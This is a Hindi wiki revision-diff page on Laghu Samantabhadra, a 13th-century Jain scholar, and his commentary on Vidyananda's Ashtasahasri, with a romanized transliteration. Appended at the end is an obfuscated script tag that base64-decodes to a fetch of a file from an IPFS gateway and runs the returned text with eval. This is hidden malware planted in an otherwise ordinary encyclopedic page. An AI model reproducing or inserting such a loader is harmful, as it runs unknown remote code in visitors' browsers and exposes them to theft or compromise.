Difference between revisions of "लघु समन्तभद्र"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (1 अवतरण)
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
 
(5 intermediate revisions by 4 users not shown)
Line 1: Line 1:
{{Menu}}
+
*इनका समय वि. सं. 13वीं शती है।  
==लघु समन्तभद्र / Laghu Samantbhadra==
 
*इनका समय वि0 सं0 13वीं शती है।  
 
 
*इन्होंने [[विद्यानन्द]] की अष्टसहस्री पर एक टिप्पणी लिखी है, जो अष्टसहस्री के कठिन पदों के अर्थबोध में सहायक है।  
 
*इन्होंने [[विद्यानन्द]] की अष्टसहस्री पर एक टिप्पणी लिखी है, जो अष्टसहस्री के कठिन पदों के अर्थबोध में सहायक है।  
 
*इसका नाम 'अष्टसहस्रीविषमपदतात्पर्यटीका' है।  
 
*इसका नाम 'अष्टसहस्रीविषमपदतात्पर्यटीका' है।  
 
*यह स्वतन्त्र रूप से अभी अप्रकाशित है।  
 
*यह स्वतन्त्र रूप से अभी अप्रकाशित है।  
 
*किन्तु अष्टसहस्री की पाद-टिप्पणियों में यह प्रकाशित है, जिनके सहारे से पाठक अष्टसहस्री के उन पदों का अर्थ कर लेते हैं, जो क्लिष्ट और प्रसंगोपात्त हैं।
 
*किन्तु अष्टसहस्री की पाद-टिप्पणियों में यह प्रकाशित है, जिनके सहारे से पाठक अष्टसहस्री के उन पदों का अर्थ कर लेते हैं, जो क्लिष्ट और प्रसंगोपात्त हैं।
[[Category:कोश]]
+
==संबंधित लेख==
 +
{{जैन धर्म2}}
 +
{{जैन धर्म}}
 +
[[Category:दर्शन कोश]]
 
[[Category:जैन_दर्शन]]
 
[[Category:जैन_दर्शन]]
 
__INDEX__
 
__INDEX__

Latest revision as of 18:40, 14 September 2010

  • inaka samay vi. san. 13vian shati hai.
  • inhoanne vidyanand ki ashtasahasri par ek tippani likhi hai, jo ashtasahasri ke kathin padoan ke arthabodh mean sahayak hai.
  • isaka nam 'ashtasahasrivishamapadatatparyatika' hai.
  • yah svatantr roop se abhi aprakashit hai.
  • kintu ashtasahasri ki pad-tippaniyoan mean yah prakashit hai, jinake sahare se pathak ashtasahasri ke un padoan ka arth kar lete haian, jo klisht aur prasangopatt haian.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>